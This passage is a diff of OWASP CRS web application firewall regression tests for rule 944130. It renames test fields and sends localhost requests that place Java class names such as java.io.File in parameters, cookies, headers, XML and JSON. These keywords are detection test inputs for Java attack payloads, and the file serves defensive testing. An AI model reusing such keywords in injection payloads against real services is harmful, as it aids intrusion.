"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.CharArrayReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 72 desc: "XML attribute value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 73 desc: "XML element value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log: + expect_ids: [944130] + - test_id: 74 desc: "Nested XML element value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.CharArrayReader" + output: + log: + expect_ids: [944130] + - test_id: 75 desc: "Content-Type text/plain includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.CharArrayReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-76 + - input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.CharArrayReader" + output: + log: + expect_ids: [944130] + - test_id: 76 desc: "Content-Type application/json arg value includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.CharArrayReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.CharArrayReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 77 desc: "Content-Type application/json arg name includes keyword java.io.CharArrayReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.CharArrayReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.CharArrayReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 78 desc: "Argument test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log: + expect_ids: [944130] + - test_id: 79 desc: "Argument name includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 80 desc: "Cookie test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.DataInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.DataInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - 
test_id: 81 desc: "Cookie name includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.DataInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-82 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.DataInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 82 desc: "Request header test includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.DataInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-83 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.DataInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 83 desc: "XML attribute value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-84 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 84 desc: "XML element value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-85 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log: + expect_ids: [944130] + - test_id: 85 desc: "Nested XML element value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-86 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.DataInputStream" + output: + log: + expect_ids: [944130] + - test_id: 86 desc: "Content-Type text/plain includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.DataInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-87 + - input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.DataInputStream" + output: + log: + expect_ids: [944130] + - test_id: 87 desc: "Content-Type application/json arg value includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.DataInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-88 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.DataInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 88 desc: "Content-Type application/json arg name includes keyword java.io.DataInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.DataInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-89 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.DataInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 89 desc: "Argument test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-90 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log: + expect_ids: [944130] + - test_id: 90 desc: "Argument name includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-91 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File=test" + output: + log: + expect_ids: [944130] + - test_id: 91 desc: "Cookie test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.File - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-92 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.File + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 92 desc: "Cookie name includes keyword 
java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.File=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-93 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.File=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 93 desc: "Request header test includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.File - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-94 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + 
test: java.io.File + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 94 desc: "XML attribute value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-95 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 95 desc: "XML element value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File" + output: + log: + expect_ids: [944130] + - test_id: 96 desc: "Nested XML element value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.File" + output: + log: + expect_ids: [944130] + - test_id: 97 desc: "Content-Type text/plain includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-98 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log: + expect_ids: [944130] + - test_id: 98 desc: "Content-Type application/json arg value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.File\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.File\"}" + output: + log: + expect_ids: [944130] + - test_id: 99 desc: "Content-Type application/json arg name includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.File\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-100 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test 
